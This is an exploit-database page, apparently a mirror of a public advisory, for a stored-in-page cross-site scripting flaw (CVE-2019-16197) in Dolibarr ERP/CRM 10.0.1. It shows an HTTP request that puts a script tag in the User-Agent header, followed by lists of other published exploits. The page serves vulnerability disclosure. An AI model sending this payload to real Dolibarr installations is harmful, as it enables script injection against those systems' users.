Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2019-09-13

                
                    
                         Download file
                    
                
            
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================

Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.

GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

Release Date	Title	Type	Platform	Author
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"

Release Date	Title	Type	Platform	Author
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"WordPress Plugin Wp-FileManager 6.8 - RCE"	webapps	php	"Mansoor R"
2020-12-02	"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution"	webapps	php	zetc0de
2020-12-02	"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting"	webapps	php	"Hemant Patidar"
2020-12-02	"Simple College Website 1.0 - 'page' Local File Inclusion"	webapps	php	Mosaaed
2020-12-02	"Car Rental Management System 1.0 - SQL Injection / Local File include"	webapps	php	Mosaaed
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"
2020-12-02	"WonderCMS 3.1.3 - Authenticated Remote Code Execution"	webapps	php	zetc0de
2020-12-01	"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS"	webapps	php	yunaranyancat

Release Date	Title	Type	Platform	Author
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-07-15	"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-07-08	"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-04-21	"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2020-04-21	"CSZ CMS 1.2.7 - 'title' HTML Injection"	webapps	php	"Metin Yunus Kandemir"
2020-03-20	"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"	webapps	php	"Metin Yunus Kandemir"
2020-01-07	"Complaint Management System 4.0 - Remote Code Execution"	webapps	php	"Metin Yunus Kandemir"
2020-01-03	"Online Course Registration 2.0 - Remote Code Execution"	webapps	php	"Metin Yunus Kandemir"
2020-01-01	"Shopping Portal ProVersion 3.0 - Authentication Bypass"	webapps	php	"Metin Yunus Kandemir"
2020-01-01	"Hospital Management System 4.0 - Authentication Bypass"	webapps	php	"Metin Yunus Kandemir"
2019-12-09	"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-09-13	"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-09-09	"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-09-09	"Dolibarr ERP-CRM 10.0.1 - SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-08-01	"Ultimate Loan Manager 2.0 - Cross-Site Scripting"	webapps	multiple	"Metin Yunus Kandemir"
2019-07-12	"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-06-24	"dotProject 2.1.9 - SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-05-29	"Free SMTP Server 2.5 - Denial of Service (PoC)"	dos	windows	"Metin Yunus Kandemir"
2019-04-03	"PhreeBooks ERP 5.2.3 - Remote Command Execution"	remote	python	"Metin Yunus Kandemir"

import requests

response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47384/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Search for hundreds of thousands of exploits

"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.